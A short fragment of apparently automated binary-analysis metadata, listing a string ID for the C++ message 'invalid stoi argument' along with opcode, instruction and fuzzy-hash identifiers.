                                  • String ID: L1$invalid stoi argument
                                  • API String ID: 909987262-3568411768
                                  • Opcode ID: e47622dc11df26dc08c4fb2b401b7d31d338c02700c477bdfd8cbdd60cf871bd
                                  • Instruction ID: 78efd1e7ad4be9be7d0762b4f7ff169cdffeb7529a09254a6fb8e8f78475cd6e
                                  • Opcode Fuzzy Hash: e47622dc11df26dc08c4fb2b401b7d31d338c02700c477bdfd8cbdd60cf871bd
                                  • Instruction Fuzzy Hash: 8FF06272501314AFD724AB69DD02A6733E8EB9A710F105825FA24B7352EB707904C6A3